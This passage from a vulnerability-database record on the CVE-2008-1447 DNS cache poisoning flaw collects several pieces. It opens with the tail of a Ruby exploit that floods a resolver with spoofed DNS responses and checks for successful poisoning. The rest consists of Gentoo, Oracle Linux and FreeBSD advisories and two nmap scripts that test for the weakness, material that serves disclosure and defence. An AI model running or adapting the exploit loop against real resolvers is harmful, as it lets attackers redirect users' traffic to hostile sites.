\nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} 
queries and #{responses} spoofed responses...\") \nend \n \n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nprint_status(\"Poisoning successful after #{queries} attempts: #{name} == #{address}\") \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68471/bailiwicked_host.rb.txt"}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "### Background\n\nISC BIND is the Internet Systems Consortium implementation of the Domain Name System (DNS) protocol. \n\n### Description\n\nDan Kaminsky of IOActive has reported a weakness in the DNS protocol related to insufficient randomness of DNS transaction IDs and query source ports. \n\n### Impact\n\nAn attacker could exploit this weakness to poison the cache of a recursive resolver and thus spoof DNS traffic, which could e.g. lead to the redirection of web or mail traffic to malicious sites. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll BIND users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/bind-9.4.2_p1\"\n\nNote: In order to utilize the query port randomization to mitigate the weakness, you need to make sure that your network setup allows the DNS server to use random source ports for its outgoing queries (for example, that no firewall or NAT device in the path rewrites them to a fixed or sequential port) and that you have not set a fixed query port via the \"query-source port\" directive in the BIND configuration.", "edition": 1, "modified": "2008-07-11T00:00:00", "published": "2008-07-11T00:00:00", "id": "GLSA-200807-08", "href": "https://security.gentoo.org/glsa/200807-08", "type": "gentoo", "title": "BIND: Cache poisoning", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "bind: \n[9.3.4-6.0.1.P1]\n- CVE-2008-1447\nselinux-policy:\n[2.4.6-137.1]\n- Allow named to bind to any udp port\nResolves: #451971", "edition": 4, "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "ELSA-2008-0533", "href": "http://linux.oracle.com/errata/ELSA-2008-0533.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "[2.45-1.el5.1]\n- update to new upstream version\n- fixes for CVE-2008-1447/CERT VU#800113\n- Resolves: rhbz#454869", "edition": 4, "modified": "2008-08-11T00:00:00", "published": "2008-08-11T00:00:00", "id": "ELSA-2008-0789", "href": "http://linux.oracle.com/errata/ELSA-2008-0789.html", "title": "dnsmasq security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:55", "description": "Checks a DNS server for the predictable-port recursion vulnerability. 
Predictable source ports can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the porttest server. In addition your IP address will be sent along with the porttest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-srcport <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-srcport: X.X.X.X is GREAT: 26 queries in 1.2 seconds from 26 ports with std dev 17905\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 7, "published": "2008-11-06T02:52:59", "title": "dns-random-srcport NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-SRCPORT.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-srcport.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-port recursion vulnerability.\nPredictable source ports can make a DNS server vulnerable to cache poisoning\nattacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/porttest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the porttest\nserver. 
In addition your IP address will be sent along with the\nporttest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\nporttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-srcport <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-srcport: X.X.X.X is GREAT: 26 queries in 1.2 seconds from 26 ports with std dev 17905\n\n-- This script uses (with permission) Duane Wessels' porttest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbeef\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: porttest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xbe, 0xef, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00, -- Additional RRs\n 0x08) .. \"porttest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. 
\"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xbe\n or string.byte(result, 2) ~= 0xef) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. 
If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T17:05:16", "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/txidtest). Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the txidtest server. 
In addition your IP address will be sent along with the txidtest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-txid <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 3, "published": "2008-11-06T02:52:59", "title": "dns-random-txid NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-TXID.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-txid.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-TXID DNS recursion\nvulnerability. Predictable TXID values can make a DNS server vulnerable to\ncache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/txidtest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the txidtest\nserver. 
In addition your IP address will be sent along with the\ntxidtest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\ntxidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-txid <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n-- This script uses (with permission) Duane Wessels' txidtest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbabe\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: txidtest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xba, 0xbe, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00, -- Additional RRs\n 0x08) .. \"txidtest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. 
\"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xba\n or string.byte(result, 2) ~= 0xbe) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. 
If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nProblem Description:\nThe BIND DNS implementation does not randomize the UDP source\n\t port when doing remote queries, and the query id alone does\n\t not provide adequate randomization.\nImpact:\nThe lack of source port randomization reduces the amount of\n\t data the attacker needs to guess in order to successfully\n\t execute a DNS cache poisoning attack. 
This allows the\n\t attacker to influence or control the results of DNS queries\n\t being returned to users from target systems.\nWorkaround:\nLimiting the group of machines that can do recursive queries\n\t on the DNS server will make it more difficult, but not\n\t impossible, for this vulnerability to be exploited.\nTo limit the machines able to perform recursive queries, add an ACL in\n\t named.conf and limit recursion like the following:\nacl example-acl {\n 192.0.2.0/24;\n};\noptions {\n\trecursion yes;\n\tallow-recursion { example-acl; };\n};\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2008-07-08T00:00:00", "id": "655EE1EC-511B-11DD-80BA-000BCDF0A03B", "href": "https://vuxml.freebsd.org/freebsd/655ee1ec-511b-11dd-80ba-000bcdf0a03b.html", "title": "FreeBSD -- DNS cache poisoning", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nThe official ruby site reports:\n\nresolv.rb allows remote attackers to spoof DNS answers. This risk\n\t can be reduced by randomizing DNS transaction IDs and source\n\t ports.\n\n", "edition": 4, "modified": "2009-02-09T00:00:00", "published": "2008-08-08T00:00:00", "id": "959D384D-6B59-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/959d384d-6b59-11dd-9d79-001fc61c2a55.html", "title": "ruby -- DNS spoofing vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}